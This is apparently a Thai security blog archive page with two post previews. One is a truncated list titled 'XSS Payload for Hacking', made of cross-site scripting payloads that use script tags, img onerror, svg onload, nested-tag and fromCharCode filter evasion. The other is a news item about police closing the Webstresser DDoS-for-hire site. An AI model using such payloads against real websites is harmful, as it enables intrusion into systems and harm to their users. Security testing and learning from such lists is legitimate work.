บทความ

กำลังแสดงโพสต์จาก กรกฎาคม, 2018

XSS Payload for Hacking ครั้งที่ 1

XSS Payload for Hacking ครั้งที่ 1 XSS in HTML/Applications XSS Basic Basic payload < script > alert ( ' XSS ' ) < / script > < scr < script > ipt > alert ( ' XSS ' ) < / scr < script > ipt > " ><script>alert('XSS')</script> " >< script > alert ( String . fromCharCode ( 88 , 83 , 83 )) < / script > Img payload < img src = x onerror = alert ( ' XSS ' ); > < img src = x onerror = alert ( ' XSS ' ) // < img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x oneonerrorrror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x : alert (alt) onerror = eval (src) alt = xss > " ><img src=x onerror=alert('XSS');> " >< img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > Svg payload < svg onload = alert ( 1 ) > < svg / onload
แสดงความคิดเห็น
อ่านเพิ่มเติม

ตำรวจสากลบุกจับกุมเจ้าของและปิดเว็บตลาดค้นหาคนรับจ้างยิง DDoS

รูปภาพ
    กองกำลังตำรวจจากนานาชาติ พร้อมด้วยตำรวจสากล ได้บุกเข้าจับกุมเจ้าของเว็บไซต์ Webstresser.org ซึ่งเป็นเว็บคนกลาง (marketplace) ในการค้นหาและใช้บริการยิง DDoS ที่ใหญ่ที่สุดของโลก ด้วยจำนวนผู้ใช้งานที่ลงทะเบียน 136,000 คน และมีส่วนในการโจมตีกว่า 4 ล้านครั้ง นับเฉพาะเดือนเมษายนนี้ ตำรวจสากลสามารถระบุตัวแอดมินของเว็บได้ว่าอาศัยอยู่ในแคนาดา, โครเอเชีย, เซอร์เบียและสหราชอาณาจักร ขณะที่เซิร์ฟเวอร์ตั้งอยู่ในเนเธอร์แลนด์, สหรัฐและเยอรมนี ก่อนจะมีมาตรการจัดการกับผู้ใช้ระดับสูงต่อไป ที่ทางตำรวจสากลระบุตัวได้แล้วว่าอาศัยอยู่ในออสเตรเลีย, แคนาดา, โครเอเชีย, ฮ่องกง, อิตาลี, เนเธอแลนด์, สเปนและสหราชอาณาจักร Webstresser มีลักษณะคล้ายกับเว็บอีคอมเมิร์ซ คือเป็นตัวกลางให้ผู้ขายบริการ DDoS กับลูกค้ามาเจอกัน โดยค่าใช้จ่ายในการใช้บริการอาจต่ำถึง 15 ยูโร (ราว 600 บาท) ต่อเดือน ซึ่งเว็บลักษณะนี้มีส่วนทำให้การโจมตี DDoS ถี่มากขึ้น โดยข้อมูลจาก Corero บริษัทวิจัยด้านความปลอดภัยระบุว่า ลูกค้าของบริษัทเจอกับการโจมตีเฉลี่ยที่ 6 ครั้งต่อวัน ที่มา : https://www.blognone.com/node/101844
2 ความคิดเห็น
อ่านเพิ่มเติม